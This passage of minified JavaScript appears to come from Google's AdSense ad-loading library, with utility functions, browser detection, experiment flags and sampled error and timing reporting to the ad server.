b=typeof a;return"object"==b&&null!=a||"function"==b}function Aa(a){return a[Ba]||(a[Ba]=++Ca)}var Ba="closure_uid_"+(1E9*Math.random()>>>0),Ca=0;function Da(a,b,c){return a.call.apply(a.bind,arguments)}function Ea(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}}function Fa(a,b,c){Function.prototype.bind&&-1!=Function.prototype.bind.toString().indexOf("native code")?Fa=Da:Fa=Ea;return Fa.apply(null,arguments)}function Ga(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}}function r(a,b){function c(){}c.prototype=b.prototype;a.prototype=new c;a.prototype.constructor=a};var Ha=(new Date).getTime();function Ia(a,b){for(var c=a.length,d=q(a)?a.split(""):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function Ja(a,b){for(var c=a.length,d=[],e=0,f=q(a)?a.split(""):a,g=0;g<c;g++)if(g in f){var h=f[g];b.call(void 0,h,g,a)&&(d[e++]=h)}return d}function Ka(a,b){for(var c=a.length,d=Array(c),e=q(a)?a.split(""):a,f=0;f<c;f++)f in e&&(d[f]=b.call(void 0,e[f],f,a));return d}function La(a,b){for(var c=a.length,d=q(a)?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;return!1}function Ma(a,b){a:{for(var c=a.length,d=q(a)?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){b=e;break a}b=-1}return 0>b?null:q(a)?a.charAt(b):a[b]}function Na(a,b){a:{for(var c=q(a)?a.split(""):a,d=a.length-1;0<=d;d--)if(d in c&&b.call(void 0,c[d],d,a)){b=d;break a}b=-1}return 0>b?null:q(a)?a.charAt(b):a[b]}function Oa(a,b){a:if(q(a))a=q(b)&&1==b.length?a.indexOf(b,0):-1;else{for(var c=0;c<a.length;c++)if(c in a&&a[c]===b){a=c;break a}a=-1}return 0<=a};function Pa(){return function(){return!xa.apply(this,arguments)}}function Qa(a){var b=!1,c;return function(){b||(c=a(),b=!0);return c}}function Ra(a){var b=a;return function(){if(b){var c=b;b=null;c()}}};function Sa(a,b){for(var c in a)if(b.call(void 0,a[c],c,a))return!0;return!1}function Ta(a){var b=[],c=0,d;for(d in a)b[c++]=a[d];return b}function Ua(a,b){return null!==a&&b in a};function Va(){this.a="";this.h=Wa}Va.prototype.f=!0;Va.prototype.b=function(){return this.a.toString()};function Xa(a){if(a instanceof Va&&a.constructor===Va&&a.h===Wa)return a.a;wa(a);return"type_error:TrustedResourceUrl"}var Wa={};function Ya(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]}var Za=/&/g,$a=/</g,ab=/>/g,bb=/"/g,cb=/'/g,db=/\x00/g;function eb(a,b){return-1!=a.indexOf(b)}function fb(a,b){var c=0;a=Ya(String(a)).split(".");b=Ya(String(b)).split(".");for(var d=Math.max(a.length,b.length),e=0;0==c&&e<d;e++){var f=a[e]||"",g=b[e]||"";do{f=/(\d*)(\D*)(.*)/.exec(f)||["","","",""];g=/(\d*)(\D*)(.*)/.exec(g)||["","","",""];if(0==f[0].length&&0==g[0].length)break;c=gb(0==f[1].length?0:parseInt(f[1],10),0==g[1].length?0:parseInt(g[1],10))||gb(0==f[2].length,0==g[2].length)||gb(f[2],g[2]);f=f[3];g=g[3]}while(0==c)}return c}function gb(a,b){return a<b?-1:a>b?1:0};function hb(){this.a="";this.h=ib}hb.prototype.f=!0;hb.prototype.b=function(){return this.a.toString()};function jb(a){if(a instanceof hb&&a.constructor===hb&&a.h===ib)return a.a;wa(a);return"type_error:SafeUrl"}var kb=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i,ib={};function lb(a){var b=new hb;b.a=a;return b}lb("about:blank");var mb;a:{var nb=p.navigator;if(nb){var ob=nb.userAgent;if(ob){mb=ob;break a}}mb=""}function t(a){return eb(mb,a)}function pb(a){for(var b=/(\w[\w ]+)\/([^\s]+)\s*(?:\((.*?)\))?/g,c=[],d;d=b.exec(a);)c.push([d[1],d[2],d[3]||void 0]);return c};function qb(){return(t("Chrome")||t("CriOS"))&&!t("Edge")}function rb(){function a(e){e=Ma(e,d);return c[e]||""}var b=mb;if(t("Trident")||t("MSIE"))return tb(b);b=pb(b);var c={};Ia(b,function(e){c[e[0]]=e[1]});var d=Ga(Ua,c);return t("Opera")?a(["Version","Opera"]):t("Edge")?a(["Edge"]):t("Edg/")?a(["Edg"]):qb()?a(["Chrome","CriOS"]):(b=b[2])&&b[1]||""}function ub(a){return 0<=fb(rb(),a)}function tb(a){var b=/rv: *([\d\.]*)/.exec(a);if(b&&b[1])return b[1];b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),"7.0"==c[1])if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";break;case "7.0":b="11.0"}else b="7.0";else b=c[1];return b};function vb(a,b){a.src=Xa(b);(b=qa())&&a.setAttribute("nonce",b)};var wb={"\x00":"\\0","\b":"\\b","\f":"\\f","\n":"\\n","\r":"\\r","\t":"\\t","\x0B":"\\x0B",'"':'\\"',"\\":"\\\\","<":"\\u003C"},xb={"'":"\\'"};function yb(a){return String(a).replace(/\-([a-z])/g,function(b,c){return c.toUpperCase()})};function zb(a){zb[" "](a);return a}zb[" "]=ua;function v(){}var Ab="function"==typeof Uint8Array;function x(a,b,c,d){a.a=null;b||(b=[]);a.w=void 0;a.h=-1;a.b=b;a:{if(b=a.b.length){--b;var e=a.b[b];if(!(null===e||"object"!=typeof e||ya(e)||Ab&&e instanceof Uint8Array)){a.i=b-a.h;a.f=e;break a}}a.i=Number.MAX_VALUE}a.s={};if(c)for(b=0;b<c.length;b++)e=c[b],e<a.i?(e+=a.h,a.b[e]=a.b[e]||Bb):(Cb(a),a.f[e]=a.f[e]||Bb);if(d&&d.length)for(b=0;b<d.length;b++)Db(a,d[b])}var Bb=[];function Cb(a){var b=a.i+a.h;a.b[b]||(a.f=a.b[b]={})}function y(a,b){if(b<a.i){b+=a.h;var c=a.b[b];return c===Bb?a.b[b]=[]:c}if(a.f)return c=a.f[b],c===Bb?a.f[b]=[]:c}function Eb(a,b){a=y(a,b);return null==a?a:+a}function Fb(a,b){a=y(a,b);return null==a?a:!!a}function A(a,b,c){a=y(a,b);return null==a?c:a}function Gb(a,b){a=Fb(a,b);return null==a?!1:a}function Hb(a,b){a=Eb(a,b);return null==a?0:a}function Ib(a,b,c){b<a.i?a.b[b+a.h]=c:(Cb(a),a.f[b]=c);return a}function Db(a,b){for(var c,d,e=0;e<b.length;e++){var f=b[e],g=y(a,f);null!=g&&(c=f,d=g,Ib(a,f,void 0))}return c?(Ib(a,c,d),c):0}function B(a,b,c){a.a||(a.a={});if(!a.a[c]){var d=y(a,c);d&&(a.a[c]=new b(d))}return a.a[c]}function C(a,b,c){a.a||(a.a={});if(!a.a[c]){for(var d=y(a,c),e=[],f=0;f<d.length;f++)e[f]=new b(d[f]);a.a[c]=e}b=a.a[c];b==Bb&&(b=a.a[c]=[]);return b}function Jb(a){if(a.a)for(var b in a.a){var c=a.a[b];if(ya(c))for(var d=0;d<c.length;d++)c[d]&&Jb(c[d]);else c&&Jb(c)}return a.b};function Kb(a){x(this,a,Lb,null)}r(Kb,v);function Mb(a){x(this,a,null,null)}r(Mb,v);var Lb=[2,3];function Nb(a){x(this,a,null,null)}r(Nb,v);var Ob=document,D=window;var Pb={"120x90":!0,"160x90":!0,"180x90":!0,"200x90":!0,"468x15":!0,"728x15":!0};function Qb(a,b){if(15==b){if(728<=a)return 728;if(468<=a)return 468}else if(90==b){if(200<=a)return 200;if(180<=a)return 180;if(160<=a)return 160;if(120<=a)return 120}return null};function Rb(a,b){return a.createElement(String(b))}function Sb(a){this.a=a||p.document||document}Sb.prototype.contains=function(a,b){if(!a||!b)return!1;if(a.contains&&1==b.nodeType)return a==b||a.contains(b);if("undefined"!=typeof a.compareDocumentPosition)return a==b||!!(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a};function Tb(a){Ub();var b=new Va;b.a=a;return b}var Ub=ua;function Vb(){return!(t("iPad")||t("Android")&&!t("Mobile")||t("Silk"))&&(t("iPod")||t("iPhone")||t("Android")||t("IEMobile"))};function Wb(a){try{var b;if(b=!!a&&null!=a.location.href)a:{try{zb(a.foo);b=!0;break a}catch(c){}b=!1}return b}catch(c){return!1}}function Xb(a){for(var b=p,c=0;b&&40>c++&&(!Wb(b)||!a(b));)a:{try{var d=b.parent;if(d&&d!=b){b=d;break a}}catch(e){}b=null}}function Yb(){var a=p;Xb(function(b){a=b;return!1});return a}function Zb(a,b){var c=a.createElement("script");vb(c,Tb(b));return(a=a.getElementsByTagName("script")[0])&&a.parentNode?(a.parentNode.insertBefore(c,a),c):null}function $b(a,b){return b.getComputedStyle?b.getComputedStyle(a,null):a.currentStyle}function ac(a,b,c){var d=!1;void 0===c||c||(d=bc());return!d&&!cc()&&(c=Math.random(),c<b)?(c=dc(p),a[Math.floor(c*a.length)]):null}function dc(a){if(!a.crypto)return Math.random();try{var b=new Uint32Array(1);a.crypto.getRandomValues(b);return b[0]/65536/65536}catch(c){return Math.random()}}function ec(a,b){if(a)for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.call(void 0,a[c],c,a)}function fc(a){var b=a.length;if(0==b)return 0;for(var c=305419896,d=0;d<b;d++)c^=(c<<5)+(c>>2)+a.charCodeAt(d)&4294967295;return 0<c?c:4294967296+c}var cc=Qa(function(){return eb(mb,"Google Web Preview")||1E-4>Math.random()}),bc=Qa(function(){return eb(mb,"MSIE")}),gc=/^([0-9.]+)px$/,hc=/^(-?[0-9.]{1,30})$/;function ic(a){return hc.test(a)&&(a=Number(a),!isNaN(a))?a:null}function jc(a,b){return b?!/^false$/.test(a):/^true$/.test(a)}function F(a){return(a=gc.exec(a))?+a[1]:null}function kc(a){var b={display:"none"};a.style.setProperty?ec(b,function(c,d){a.style.setProperty(d,c,"important")}):a.style.cssText=lc(mc(nc(a.style.cssText),oc(b,function(c){return c+" !important"})))}var mc=Object.assign||function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};function oc(a,b){var c={},d;for(d in a)Object.prototype.hasOwnProperty.call(a,d)&&(c[d]=b.call(void 0,a[d],d,a));return c}function lc(a){var b=[];ec(a,function(c,d){null!=c&&""!==c&&b.push(d+":"+c)});return b.length?b.join(";")+";":""}function nc(a){var b={};if(a){var c=/\s*:\s*/;Ia((a||"").split(/\s*;\s*/),function(d){if(d){var e=d.split(c);d=e[0];e=e[1];d&&e&&(b[d.toLowerCase()]=e)}})}return b}var pc=Qa(function(){var a=/Edge\/([^. ]+)/.exec(navigator.userAgent);return a?18<=parseInt(a[1],10):(a=/Chrome\/([^. ]+)/.exec(navigator.userAgent))?71<=parseInt(a[1],10):(a=/AppleWebKit\/([^. ]+)/.exec(navigator.userAgent))?13<=parseInt(a[1],10):(a=/Firefox\/([^. ]+)/.exec(navigator.userAgent))?64<=parseInt(a[1],10):!1}),qc=Qa(function(){return qb()&&ub(72)||t("Edge")&&ub(18)||(t("Firefox")||t("FxiOS"))&&ub(65)||t("Safari")&&!(qb()||t("Coast")||t("Opera")||t("Edge")||t("Edg/")||t("OPR")||t("Firefox")||t("FxiOS")||t("Silk")||t("Android"))&&ub(12)});function rc(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)};function sc(a,b){p.google_image_requests||(p.google_image_requests=[]);var c=p.document.createElement("img");if(b){var d=function(e){b&&b(e);c.removeEventListener&&c.removeEventListener("load",d,!1);c.removeEventListener&&c.removeEventListener("error",d,!1)};rc(c,"load",d);rc(c,"error",d)}c.src=a;p.google_image_requests.push(c)};function tc(a,b){a=parseInt(a,10);return isNaN(a)?b:a}var uc=/^([\w-]+\.)*([\w-]{2,})(:[0-9]+)?$/;function vc(a,b){return a?(a=a.match(uc))?a[0]:b:b};function wc(){return"r20190814"}var xc=jc("false",!1),yc=jc("false",!1),zc=jc("true",!1)||!yc;function Ac(){return vc("","pagead2.googlesyndication.com")};function Bc(a){a=void 0===a?p:a;var b=a.context||a.AMP_CONTEXT_DATA;if(!b)try{b=a.parent.context||a.parent.AMP_CONTEXT_DATA}catch(c){}try{if(b&&b.pageViewId&&b.canonicalUrl)return b}catch(c){}return null}function Cc(a){return(a=a||Bc())?Wb(a.master)?a.master:null:null};function Dc(a,b){for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.call(void 0,a[c],c,a)}function Ec(a){return!(!a||!a.call)&&"function"===typeof a}function Fc(a){a=Cc(Bc(a))||a;a.google_unique_id?++a.google_unique_id:a.google_unique_id=1}function Gc(a){a=Cc(Bc(a))||a;a=a.google_unique_id;return"number"===typeof a?a:0}var Hc=!!window.google_async_iframe_id,Ic=Hc&&window.parent||window;function Jc(){if(Hc&&!Wb(Ic)){var a="."+Ob.domain;try{for(;2<a.split(".").length&&!Wb(Ic);)Ob.domain=a=a.substr(a.indexOf(".")+1),Ic=window.parent}catch(b){}Wb(Ic)||(Ic=window)}return Ic}var Kc=/(^| )adsbygoogle($| )/;function Lc(a){return xc&&a.google_top_window||a.top}function Mc(a){a=Lc(a);return Wb(a)?a:null};function I(a){a.google_ad_modifications||(a.google_ad_modifications={});return a.google_ad_modifications}function J(a,b){a:if(a=I(a).eids||[],a.indexOf)b=a.indexOf(b),b=0<b||0===b;else{for(var c=0;c<a.length;c++)if(a[c]===b){b=!0;break a}b=!1}return b}function Nc(a,b){a=I(a);a.tag_partners=a.tag_partners||[];a.tag_partners.push(b)}function Oc(a){I(D).allow_second_reactive_tag=a}function Pc(a,b,c){for(var d=0;d<a.length;++d)if((a[d].ad_slot||b)==b&&(a[d].ad_tag_origin||c)==c)return a[d];return null};var Qc={},Rc=(Qc.google_ad_client=!0,Qc.google_ad_host=!0,Qc.google_ad_host_channel=!0,Qc.google_adtest=!0,Qc.google_tag_for_child_directed_treatment=!0,Qc.google_tag_for_under_age_of_consent=!0,Qc.google_tag_partner=!0,Qc);function Sc(a){x(this,a,Tc,null)}r(Sc,v);var Tc=[4];Sc.prototype.X=function(){return y(this,3)};function Uc(a){x(this,a,null,null)}r(Uc,v);function Vc(a){x(this,a,null,Wc)}r(Vc,v);function Xc(a){x(this,a,null,null)}r(Xc,v);function Yc(a){x(this,a,null,null)}r(Yc,v);function Zc(a){x(this,a,null,null)}r(Zc,v);var Wc=[[1,2,3]];function $c(a){x(this,a,null,null)}r($c,v);function ad(a){x(this,a,null,null)}r(ad,v);function bd(a){x(this,a,cd,null)}r(bd,v);var cd=[6,7,9,10,11];function dd(a){x(this,a,ed,null)}r(dd,v);function fd(a){x(this,a,null,null)}r(fd,v);function gd(a){x(this,a,hd,null)}r(gd,v);function id(a){x(this,a,null,null)}r(id,v);function jd(a){x(this,a,null,null)}r(jd,v);function kd(a){x(this,a,null,null)}r(kd,v);function ld(a){x(this,a,null,null)}r(ld,v);var ed=[1,2,5,7],hd=[2,5,6];var md={overlays:1,interstitials:2,vignettes:2,inserts:3,immersives:4,list_view:5,full_page:6};function nd(a,b){a=a.replace(/(^\/)|(\/$)/g,"");var c=fc(a),d=od(a);return b.find(function(e){var f=null!=y(e,7)?y(B(e,id,7),1):y(e,1);e=null!=y(e,7)?y(B(e,id,7),2):2;if(!pa(f))return!1;switch(e){case 1:return f==c;case 2:return d[f]||!1}return!1})||null}function od(a){for(var b={};;){b[fc(a)]=!0;if(!a)return b;a=a.substring(0,a.lastIndexOf("/"))}};function pd(a,b){var c=void 0===c?{}:c;this.error=a;this.context=b.context;this.msg=b.message||"";this.id=b.id||"jserror";this.meta=c};var qd=/^https?:\/\/(\w|-)+\.cdn\.ampproject\.(net|org)(\?|\/|$)/;function rd(a,b){this.a=a;this.b=b}function sd(a,b,c){this.url=a;this.a=b;this.qa=!!c;this.depth=pa(void 0)?void 0:null};function td(){this.f="&";this.h=!1;this.b={};this.i=0;this.a=[]}function ud(a,b){var c={};c[a]=b;return[c]}function vd(a,b,c,d,e){var f=[];ec(a,function(g,h){(g=wd(g,b,c,d,e))&&f.push(h+"="+g)});return f.join(b)}function wd(a,b,c,d,e){if(null==a)return"";b=b||"&";c=c||",$";"string"==typeof c&&(c=c.split(""));if(a instanceof Array){if(d=d||0,d<c.length){for(var f=[],g=0;g<a.length;g++)f.push(wd(a[g],b,c,d+1,e));return f.join(c[d])}}else if("object"==typeof a)return e=e||0,2>e?encodeURIComponent(vd(a,b,c,d,e+1)):"...";return encodeURIComponent(String(a))}function xd(a,b,c,d){a.a.push(b);a.b[b]=ud(c,d)}function yd(a,b,c){b=b+"//pagead2.googlesyndication.com"+c;var d=zd(a)-c.length;if(0>d)return"";a.a.sort(function(n,u){return n-u});c=null;for(var e="",f=0;f<a.a.length;f++)for(var g=a.a[f],h=a.b[g],k=0;k<h.length;k++){if(!d){c=null==c?g:c;break}var m=vd(h[k],a.f,",$");if(m){m=e+m;if(d>=m.length){d-=m.length;b+=m;e=a.f;break}else a.h&&(e=d,m[e-1]==a.f&&--e,b+=m.substr(0,e),e=a.f,d=0);c=null==c?g:c}}a="";null!=c&&(a=e+"trn="+c);return b+a}function zd(a){var b=1,c;for(c in a.b)b=c.length>b?c.length:b;return 3997-b-a.f.length-1};function Ad(){var a=void 0===a?D:a;this.a="http:"===a.location.protocol?"http:":"https:";this.b=Math.random()}function Bd(a,b,c,d,e,f){if((d?a.b:Math.random())<(e||.01))try{if(c instanceof td)var g=c;else g=new td,ec(c,function(k,m){var n=g,u=n.i++;k=ud(m,k);n.a.push(u);n.b[u]=k});var h=yd(g,a.a,"/pagead/gen_204?id="+b+"&");h&&("undefined"===typeof f?sc(h,null):sc(h,void 0===f?null:f))}catch(k){}};function Cd(a,b){this.start=a<b?a:b;this.a=a<b?b:a};function K(a,b,c){this.b=b>=a?new Cd(a,b):null;this.a=c}function Dd(a,b){var c=-1;b="google_experiment_mod"+(void 0===b?"":b);try{a.localStorage&&(c=parseInt(a.localStorage.getItem(b),10))}catch(d){return null}if(0<=c&&1E3>c)return c;if(cc())return null;c=Math.floor(1E3*dc(a));try{if(a.localStorage)return a.localStorage.setItem(b,""+c),c}catch(d){}return null};var Ed=null;function Fd(){if(null===Ed){Ed="";try{var a="";try{a=p.top.location.hash}catch(c){a=p.location.hash}if(a){var b=a.match(/\bdeid=([\d,]+)/);Ed=b?b[1]:""}}catch(c){}}return Ed};function Gd(){var a=p.performance;return a&&a.now&&a.timing?Math.floor(a.now()+a.timing.navigationStart):+new Date}function Hd(){var a=void 0===a?p:a;return(a=a.performance)&&a.now?a.now():null};function Id(a,b,c){this.label=a;this.type=b;this.value=c;this.duration=0;this.uniqueId=Math.random();this.slotId=void 0};var Jd=p.performance,Kd=!!(Jd&&Jd.mark&&Jd.measure&&Jd.clearMarks),Ld=Qa(function(){var a;if(a=Kd)a=Fd(),a=!!a.indexOf&&0<=a.indexOf("1337");return a});function Md(){var a=Nd;this.b=[];this.f=a||p;var b=null;a&&(a.google_js_reporting_queue=a.google_js_reporting_queue||[],this.b=a.google_js_reporting_queue,b=a.google_measure_js_timing);this.a=Ld()||(null!=b?b:1>Math.random())}function Od(a){a&&Jd&&Ld()&&(Jd.clearMarks("goog_"+a.label+"_"+a.uniqueId+"_start"),Jd.clearMarks("goog_"+a.label+"_"+a.uniqueId+"_end"))}Md.prototype.start=function(a,b){if(!this.a)return null;var c=Hd()||Gd();a=new Id(a,b,c);b="goog_"+a.label+"_"+a.uniqueId+"_start";Jd&&Ld()&&Jd.mark(b);return a};function Pd(){var a=Qd;this.w=Rd;this.h=!0;this.a=null;this.s=this.b;this.f=void 0===a?null:a;this.i=!1}function Sd(a,b,c,d){try{if(a.f&&a.f.a){var e=a.f.start(b.toString(),3);var f=c();var g=a.f;c=e;if(g.a&&pa(c.value)){var h=Hd()||Gd();c.duration=h-c.value;var k="goog_"+c.label+"_"+c.uniqueId+"_end";Jd&&Ld()&&Jd.mark(k);!g.a||2048<g.b.length||g.b.push(c)}}else f=c()}catch(m){g=a.h;try{Od(e),g=a.s(b,new pd(m,{message:Td(m)}),void 0,d)}catch(n){a.b(217,n)}if(!g)throw m;}return f}function Ud(a,b,c,d,e){return function(f){for(var g=[],h=0;h<arguments.length;++h)g[h]=arguments[h];return Sd(a,b,function(){return c.apply(d,g)},e)}}Pd.prototype.b=function(a,b,c,d,e){e=e||"jserror";try{var f=new td;f.h=!0;xd(f,1,"context",a);b.error&&b.meta&&b.id||(b=new pd(b,{message:Td(b)}));b.msg&&xd(f,2,"msg",b.msg.substring(0,512));var g=b.meta||{};if(this.a)try{this.a(g)}catch(G){}if(d)try{d(g)}catch(G){}b=[g];f.a.push(3);f.b[3]=b;d=p;b=[];g=null;do{var h=d;if(Wb(h)){var k=h.location.href;g=h.document&&h.document.referrer||null}else k=g,g=null;b.push(new sd(k||"",h));try{d=h.parent}catch(G){d=null}}while(d&&h!=d);k=0;for(var m=b.length-1;k<=m;++k)b[k].depth=m-k;h=p;if(h.location&&h.location.ancestorOrigins&&h.location.ancestorOrigins.length==b.length-1)for(m=1;m<b.length;++m){var n=b[m];n.url||(n.url=h.location.ancestorOrigins[m-1]||"",n.qa=!0)}var u=new sd(p.location.href,p,!1);h=null;var w=b.length-1;for(n=w;0<=n;--n){var z=b[n];!h&&qd.test(z.url)&&(h=z);if(z.url&&!z.qa){u=z;break}}z=null;var H=b.length&&b[w].url;0!=u.depth&&H&&(z=b[w]);var E=new rd(u,z);E.b&&xd(f,4,"top",E.b.url||"");xd(f,5,"url",E.a.url||"");Bd(this.w,e,f,this.i,c)}catch(G){try{Bd(this.w,e,{context:"ecmserr",rctx:a,msg:Td(G),url:E&&E.a.url},this.i,c)}catch(sb){}}return this.h};function Td(a){var b=a.toString();a.name&&-1==b.indexOf(a.name)&&(b+=": "+a.name);a.message&&-1==b.indexOf(a.message)&&(b+=": "+a.message);if(a.stack){a=a.stack;try{-1==a.indexOf(b)&&(a=b+"\n"+a);for(var c;a!=c;)c=a,a=a.replace(/((https?:\/..*\/)[^\/:]*:\d+(?:.|\n)*)\2/,"$1");b=a.replace(/\n */g,"\n")}catch(d){}}return b};function L(a){a=void 0===a?"":a;var b=Error.call(this);this.message=b.message;"stack"in b&&(this.stack=b.stack);this.name="TagError";this.message=a?"adsbygoogle.push() error: "+a:"";Error.captureStackTrace?Error.captureStackTrace(this,L):this.stack=Error().stack||""}ka(L,Error);var Rd,Vd,Wd,Nd=Jc(),Qd=new Md;function Xd(a){null!=a&&(Nd.google_measure_js_timing=a);Nd.google_measure_js_timing||(a=Qd,a.a=!1,a.b!=a.f.google_js_reporting_queue&&(Ld()&&Ia(a.b,Od),a.b.length=0))}function Yd(a){var b=D.jerExpIds;if(ya(b)&&0!==b.length){var c=a.eid;if(c){b=ca(c.split(",")).concat(ca(b));c={};for(var d=0,e=0;e<b.length;){var f=b[e++];var g=f;g=za(g)?"o"+Aa(g):(typeof g).charAt(0)+g;Object.prototype.hasOwnProperty.call(c,g)||(c[g]=!0,b[d++]=f)}b.length=d;a.eid=b.join(",")}else a.eid=b.join(",")}}(function(){Rd=new Ad;Vd=new Pd;Vd.a=function(b){Yd(b);Wd&&(b.jc=Wd)};"complete"==Nd.document.readyState?Xd():Qd.a&&rc(Nd,"load",function(){Xd()});var a=Ob.currentScript;Wd=a?a.dataset.jc:""})();function Zd(){var a=[$d,ae];Vd.a=function(b){Ia(a,function(c){c(b)});Yd(b);Wd&&(b.jc=Wd)}}function be(a,b,c){return Sd(Vd,a,b,c)}function ce(a,b){return Ud(Vd,a,b,void 0,void 0)}function de(a,b,c){Bd(Rd,a,b,"jserror"!=a,c,void 0)}function ee(a,b,c,d){return 0==(b.error&&b.meta&&b.id?b.msg||Td(b.error):Td(b)).indexOf("TagError")?(Vd.i=!0,c=b instanceof pd?b.error:b,c.pbr||(c.pbr=!0,Vd.b(a,b,.1,d,"puberror")),!1):Vd.b(a,b,c,d)}function fe(a){de("rmvasft",{code:"ldr",branch:a?"exp":"cntr"})};function ge(a,b){this.oa=a;this.ua=b}function he(a){var b=[].slice.call(arguments).filter(Pa());if(!b.length)return null;var c=[],d={};b.forEach(function(e){c=c.concat(e.oa||[]);d=Object.assign(d,e.ua)});return new ge(c,d)}function ie(a){switch(a){case 1:return new ge(null,{google_ad_semantic_area:"mc"});case 2:return new ge(null,{google_ad_semantic_area:"h"});case 3:return new ge(null,{google_ad_semantic_area:"f"});case 4:return new ge(null,{google_ad_semantic_area:"s"});default:return null}};var je=new ge(["google-auto-placed"],{google_tag_origin:"qs"});var ke={},le=(ke.google_ad_channel=!0,ke.google_ad_host=!0,ke);function me(a,b){a.location.href&&a.location.href.substring&&(b.url=a.location.href.substring(0,200));de("ama",b,.01)}function ne(a){var b={};ec(le,function(c,d){d in a&&(b[d]=a[d])});return b};var oe=tc("2012",2012);function pe(a){x(this,a,qe,re)}r(pe,v);var qe=[2,8],re=[[3,4,5],[6,7]];function se(a){return null!=a?!a:a}function te(a,b){for(var c=!1,d=0;d<a.length;d++){var e=a[d].call();if(e==b)return e;null==e&&(c=!0)}if(!c)return!b}function ue(a,b){var c=C(a,pe,2);if(!c.length)return ve(a,b);a=A(a,1,0);if(1==a)return se(ue(c[0],b));c=Ka(c,function(d){return function(){return ue(d,b)}});switch(a){case 2:return te(c,!1);case 3:return te(c,!0)}}function ve(a,b){var c=Db(a,re[0]);a:{switch(c){case 3:var d=A(a,3,0);break a;case 4:d=A(a,4,0);break a;case 5:d=A(a,5,0);break a}d=void 0}if(d&&(b=(b=b[c])&&b[d])){try{var e=b.apply(null,y(a,8))}catch(f){return}b=A(a,1,0);if(4==b)return!!e;d=null!=e;if(5==b)return d;if(12==b)a=A(a,7,"");else a:{switch(c){case 4:a=Hb(a,6);break a;case 5:a=A(a,7,"");break a}a=void 0}if(null!=a){if(6==b)return e===a;if(9==b)return 0==fb(e,a);if(d)switch(b){case 7:return e<a;case 8:return e>a;case 12:return(new RegExp(a)).test(e);case 10:return-1==fb(e,a);case 11:return 1==fb(e,a)}}}}function we(a,b){return!a||!(!b||!ue(a,b))};function xe(a){x(this,a,ye,null)}r(xe,v);var ye=[4];function ze(a){x(this,a,Ae,Be)}r(ze,v);function Ce(a){x(this,a,null,null)}r(Ce,v);var Ae=[5],Be=[[1,2,3,6]];function De(){var a={};this.a=(a[3]={},a[4]={},a[5]={},a)}va(De);function Ee(a,b){switch(b){case 1:return A(a,1,0);case 2:return A(a,2,0);case 3:return A(a,3,0);case 6:return A(a,6,0);default:return null}}function Fe(a,b){if(!a)return null;switch(b){case 1:return Gb(a,1);case 2:return Hb(a,2);case 3:return A(a,3,"");case 6:return y(a,4);default:return null}}function Ge(a,b,c){b=He.j().a[a][b];if(!b)return c;b=new ze(b);b=Ie(b);a=Fe(b,a);return null!=a?a:c}function Ie(a){var b=De.j().a;if(b){var c=Na(C(a,Ce,5),function(d){return we(B(d,pe,1),b)});if(c)return B(c,xe,2)}return B(a,xe,4)}function He(){var a={};this.a=(a[1]={},a[2]={},a[3]={},a[6]={},a)}va(He);function Je(a,b){return!!Ge(1,a,void 0===b?!1:b)}function Ke(a,b){b=void 0===b?0:b;a=Number(Ge(2,a,b));return isNaN(a)?b:a}function Le(a,b){return Ge(3,a,void 0===b?"":b)}function Me(a,b){b=void 0===b?[]:b;return Ge(6,a,b)}function Ne(a){var b=He.j().a;Ia(a,function(c){var d=Db(c,Be[0]),e=Ee(c,d);e&&(b[d][e]=Jb(c))})}function Oe(a){var b=He.j().a;Ia(a,function(c){var d=new ze(c),e=Db(d,Be[0]);(d=Ee(d,e))&&(b[e][d]||(b[e][d]=c))})};function M(a){this.a=a}var Pe=new M(1),Qe=new M(2),Re=new M(3),Se=new M(4),Te=new M(5),Ue=new M(6),Ve=new M(7),We=new M(8),Xe=new M(9),Ye=new M(10),Ze=new M(11),$e=new M(12),af=new M(13),bf=new M(14);function N(a,b,c){c.hasOwnProperty(a.a)||Object.defineProperty(c,String(a.a),{value:b})}function cf(a,b,c){return b[a.a]||c||function(){}}function df(a){N(Te,Je,a);N(Ue,Ke,a);N(Ve,Le,a);N(We,Me,a);N(af,Oe,a)}function ef(a){N(Se,function(b){De.j().a=b},a);N(Xe,function(b,c){var d=De.j();d.a[3][b]||(d.a[3][b]=c)},a);N(Ye,function(b,c){var d=De.j();d.a[4][b]||(d.a[4][b]=c)},a);N(Ze,function(b,c){var d=De.j();d.a[5][b]||(d.a[5][b]=c)},a);N(bf,function(b){for(var c=De.j(),d=ba([3,4,5]),e=d.next();!e.done;e=d.next()){var f=e.value;e=void 0;var g=c.a[f];f=b[f];for(e in f)g[e]=f[e]}},a)}function ff(a){a.hasOwnProperty("init-done")||Object.defineProperty(a,"init-done",{value:!0})};function gf(){this.a=function(){return!1}}va(gf);function hf(a,b,c){c||(c=zc?"https":"http");p.location&&"https:"==p.location.protocol&&"http"==c&&(c="https");return[c,"://",a,b].join("")}function jf(a,b,c){a=hf(a,b,c);var d=void 0===d?!1:d;if(gf.j().a(182,d)){var e;2012<oe?e=a.replace(new RegExp(".js".replace(/([-()\[\]{}+?*.$\^|,:#<!\\])/g,"\\$1").replace(/\x08/g,"\\x08"),"g"),("_fy"+oe+".js").replace(/\$/g,"$$$$")):e=a;d=e}else d=a;return d};var kf=null;function lf(){if(!xc)return!1;if(null!=kf)return kf;kf=!1;try{var 